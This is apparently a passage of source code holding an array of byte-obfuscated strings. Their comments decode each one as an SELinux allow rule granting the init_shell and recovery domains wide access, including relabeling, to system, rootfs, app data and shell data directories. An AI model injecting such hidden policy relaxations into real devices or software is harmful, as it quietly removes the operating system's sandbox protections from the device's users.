    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:app_data_file:dir:getattr"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:app_data_file:dir:setattr"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:app_data_file:dir:relabelfrom"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:app_data_file:dir:relabelto"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:shell_data_file:dir:search"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:shell_data_file:dir:add_name"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:shell_data_file:dir:remove_name"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:shell_data_file:dir:open"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:shell_data_file:dir:read"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:shell_data_file:dir:write"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:shell_data_file:dir:getattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:shell_data_file:dir:setattr"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:shell_data_file:dir:relabelfrom"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:shell_data_file:dir:relabelto"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:init_shell:lnk_file:dir:search"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:init_shell:lnk_file:dir:add_name"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:init_shell:lnk_file:dir:remove_name"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:init_shell:lnk_file:dir:open"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:init_shell:lnk_file:dir:read"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:lnk_file:dir:write"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:lnk_file:dir:getattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:lnk_file:dir:setattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:lnk_file:dir:relabelfrom"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:lnk_file:dir:relabelto"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:fuse:dir:search"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:fuse:dir:add_name"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:fuse:dir:remove_name"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:fuse:dir:open"
    "\x63\x53\x2c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:fuse:dir:read"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:fuse:dir:write"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:fuse:dir:getattr"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:fuse:dir:setattr"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:fuse:dir:relabelfrom"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:fuse:dir:relabelto"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:rootfs:dir:search"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:rootfs:dir:add_name"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:rootfs:dir:remove_name"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:rootfs:dir:open"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:rootfs:dir:read"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:rootfs:dir:write"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:rootfs:dir:getattr"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:rootfs:dir:setattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:rootfs:dir:relabelfrom"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:rootfs:dir:relabelto"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:system_file:dir:search"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:system_file:dir:add_name"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:system_file:dir:remove_name"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:system_file:dir:open"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:system_file:dir:read"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:system_file:dir:write"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_file:dir:getattr"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_file:dir:setattr"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:system_file:dir:relabelfrom"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:system_file:dir:relabelto"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:system_app_data_file:dir:search"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:system_app_data_file:dir:add_name"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:system_app_data_file:dir:remove_name"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:system_app_data_file:dir:open"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:system_app_data_file:dir:read"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:system_app_data_file:dir:write"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_app_data_file:dir:getattr"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_app_data_file:dir:setattr"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:system_app_data_file:dir:relabelfrom"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:system_app_data_file:dir:relabelto"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:app_data_file:dir:search"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:app_data_file:dir:add_name"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:app_data_file:dir:remove_name"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:app_data_file:dir:open"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:app_data_file:dir:read"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:app_data_file:dir:write"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:app_data_file:dir:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:app_data_file:dir:setattr"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:app_data_file:dir:relabelfrom"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:app_data_file:dir:relabelto"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:shell_data_file:dir:search"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:shell_data_file:dir:add_name"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:shell_data_file:dir:remove_name"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:shell_data_file:dir:open"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:shell_data_file:dir:read"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:shell_data_file:dir:write"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:shell_data_file:dir:getattr"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:shell_data_file:dir:setattr"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:shell_data_file:dir:relabelfrom"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:shell_data_file:dir:relabelto"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x30\x0a\x06\x37\x00\x0d", // "allow:recovery:lnk_file:dir:search"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x06\x09\x09\xdc\x33\x06\x32\x0a", // "allow:recovery:lnk_file:dir:add_name"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x32\x0c\x3b\x0a\xdc\x33\x06\x32\x0a", // "allow:recovery:lnk_file:dir:remove_name"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x0c\x35\x0a\x33", // "allow:recovery:lnk_file:dir:open"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x09\x0e\x37\xff\x37\x0a\x06\x09", // "allow:recovery:lnk_file:dir:read"
